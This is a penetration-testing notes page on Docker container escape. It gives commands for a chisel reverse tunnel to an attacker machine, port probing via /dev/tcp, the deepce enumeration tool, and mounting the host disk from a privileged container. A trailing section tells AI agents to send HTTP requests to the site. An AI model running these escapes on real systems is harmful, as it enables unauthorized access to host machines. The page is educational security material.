# Docker Container Escape ## Looking For Potential Files Whenever you are in a docker container, always try to enumerate the system as much as you can, because you will always find something interesting in it. ```javascript // Potential Directories where you can find something interesting /opt /home /home/ /tmp /var/www/html ``` ## Doing Reverse Proxy Using Chisel We can also do **reverse proxy using chisel**. It will help us in such a way that you want to connect to MySQL or Redis database and you are not having such tools installed on the docker container so you can do a reverse proxy and connect to MySQL or redis using proxychains ```javascript //Running Chisel on the Kali Linux First chisel server --reverse -p 1234 --socks5 // Running Chisel on the docker container ./chisel client :1234 R:socks // Now you can use proxychains and access the things on docker container ``` ## Looking For IP Addresses Sometimes you cannot run **ip a** or **ifconfig** command so you can run the following to obtain the ip address ```javascript cat /proc/net/fib_trie // this sometimes shows the ip addresses of different services ```

## Route Information We can look for routes using below command ```python cat /proc/net/route ```

to convert the hexadecimal ip we can use below python script ```python import sys def hex_to_ip(hex_str): # Split the hex string into 4 chunks of 2 characters (octets) octets = [hex_str[i:i+2] for i in range(0, len(hex_str), 2)] # Reverse the order of octets for little-endian format octets.reverse() # Convert each octet from hex to decimal ip_octets = [str(int(octet, 16)) for octet in octets] # Join the decimal octets with dots to form an IP address ip_address = ".".join(ip_octets) return ip_address if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python hex_to_ip.py ") sys.exit(1) hex_value = sys.argv[1] if len(hex_value) != 8: print("Error: The hex value should be 8 characters long.") sys.exit(1) ip = hex_to_ip(hex_value) print(f"Converted IP: {ip}") ``` ## Command To See Open Port if you want to see an open port and there is no Nmap or Netcat, you can run the below command ```python cat < /dev/tcp/172.18.0.1/3306 ```

## Automated Tools ### Deepce We can use Deepce tool from the below link to enumerate docker containers for potential escapes {% embed url="" %} ```python bash deepce.sh ```

## Docker Privileged Mode Enabled We can escalate our privileges from docker container to host machine if we have privilege mode turned on, in this case we can mount the Host Files and Folders on the Docker Container and access them ```python mkdir /mnt/host mount /dev/xvda1 /mnt/host/ cd /mnt/host/ # now you can see the Host OS Files and Folders ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.programmersecurity.com/linux-privilege-escalation/docker-container-escape.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.